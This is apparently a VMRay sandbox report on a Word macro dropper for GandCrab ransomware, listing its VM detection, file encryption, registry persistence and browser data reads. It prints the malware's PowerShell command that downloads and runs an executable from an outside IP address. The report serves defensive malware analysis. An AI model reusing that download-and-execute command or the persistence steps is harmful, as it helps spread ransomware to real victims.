Doc Dropper - Gandcrab Analysis | VTI
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Target: Windows 10 (64-bit), MS Office 2016 | ms_office
Classification: Dropper, Trojan, Downloader, Ransomware

99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809 (SHA256)

sample_file.doc

Word Document

Created at 2018-04-20 18:19:00

...

Notifications (2/3)

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The overall sleep time of all monitored processes was truncated from "1 minute, 10 seconds" to "1 minute, 10 seconds" to reveal dormant functionality.

The operating system was rebooted during the analysis because the sample installed a startup script or application for persistence.

Severity Category Operation Classification
5/5
Anti Analysis Tries to detect virtual machine -
  • Reads out system information, commonly used to detect VMs via registry. (Value "Identifier" in key "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0").
    ...
5/5
File System Modifies application directory -
5/5
OS Modifies certificate store -
  • Adds a certificate to the local "my" crab-decrypt.txt list by file.
    ...
  • Adds a certificate to the local "my" certificate trust list by file.
    ...
5/5
File System Creates an unusually large number of files -
5/5
File System Encrypts content of user files Ransomware
  • Encrypts the content of multiple user files. This is an indicator for ransomware.
    ...
4/5
Process Creates process -
  • Creates process "powershell.exe -w 1 (New-Object System.Net.WebClient).DownloadFile('http://185.189.58.222/x.exe',([System.IO.Path]::GetTempPath()+'\PHfW.exe'));powershell.exe -w 1 Start-Process -Filepath ([System.IO.Path]::GetTempPath()+'\PHfW.exe');".
    ...
  • Creates process ""C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Start-Process -Filepath C:\Users\FD1HVy\AppData\Local\Temp\\PHfW.exe".
    ...
  • Creates process "C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe".
    ...
4/5
File System Associated with malicious files Trojan
  • File "c:\users\fd1hvy\desktop\sample_file.doc" is a known malicious file.
    ...
4/5
Network Downloads data Downloader
3/5
Persistence Installs system startup script or application -
  • Adds ""C:\Users\FD1HVy\AppData\Roaming\Microsoft\ibpbzu.exe"" to Windows startup via registry.
    ...
3/5
Network Performs DNS request -
3/5
Browser Reads data related to browser cookies -
3/5
Browser Reads data related to browsing history -
  • Reads browsing history and related data, such as bookmarks, for "Mozilla Firefox".
    ...
3/5
Network Checks external IP address -
  • Checks external IP by asking IP info service at "ipv4bot.whatismyipaddress.com/".
    ...
3/5
PE Executes dropped PE file -
2/5
Network Connects to HTTP server -
2/5
PE Drops PE file Dropper
2/5
VBA Macro Executes application -
  • Shell (mbRq), 0
    ...
    • VTI Actions
1/5
Process Creates system object -
  • Creates mutex with name "Global\pc_group=WORKGROUP&ransom_id=bdc31ed2b4197730".
    ...
1/5
Process Overwrites code -
1/5
VBA Macro Executes macro on specific worksheet event -
  • Executes macro on "Open Document" event.
    ...
    • VTI Actions
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image